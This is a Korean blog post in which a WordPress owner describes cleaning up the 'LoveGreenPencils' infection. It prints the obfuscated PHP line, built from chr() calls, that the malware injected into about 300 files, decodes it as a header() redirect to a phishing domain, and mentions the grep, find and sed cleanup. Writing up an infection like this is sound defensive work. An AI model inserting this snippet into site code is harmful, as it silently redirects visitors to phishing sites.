관심거리

워드프레스 사이트가 이상한 곳으로 가요!! / 해킹당했어요

ODB 2021. 2. 1. 04:27

와... 워드프레스 취약점 때문에 고생했다

LoveGreenPencils 라는 놈인데 최근에 변형된 형태로 돌아다니는것 같다

각종 php파일에

<?php $a="h"."ea"."der";$a(chr(76).chr(111).chr(99).chr(97).chr(116).chr(105).chr(111).chr(110).chr(58).chr(32).chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(105).chr(114).chr(99).chr(46).chr(108).chr(111).chr(118).chr(101).chr(103).chr(114).chr(101).chr(101).chr(110).chr(112).chr(101).chr(110).chr(99).chr(105).chr(108).chr(115).chr(46).chr(103).chr(97).chr(47).chr(53).chr(53).chr(114).chr(121).chr(101).chr(114).chr(121).chr(63).chr(105).chr(100).chr(61).chr(50).chr(50).chr(53).chr(56).chr(52).chr(38).chr(114).chr(115).chr(61).chr(50).chr(51).chr(52).chr(54));?>

라는 내용을 써버리는데

사이트 접속 할때마다 이상한 피싱사이트로 redirect 시킨다..

처음에는 index.php 와 wp-stream.php제거 wp-blog-header.php 수정 하고 룰루랄라 페이지를 열었는데

그래도 여전히 redirect를 시켰다.

그래서 grep을 해봤다니................. 대략 300여개의 파일이 감염..................................

find와 sed를 이용해서 해당 문자열을 replace하고 나서야 겨우 멈췄지만 정말 어마무시한 놈이다

위에놈을 decode 하면 아래와 같다

$a="header";
$a("Location: https://irc.lovegreenpencils.ga/55ryery?id=22584&rs=2346");


잘 보인다 lovegreenpencils 나쁜놈................................

조심하고 또 조심하자 워드프레스

"이 포스팅은 쿠팡 파트너스 활동의 일환으로, 이에 따른 일정액의 수수료를 제공받습니다."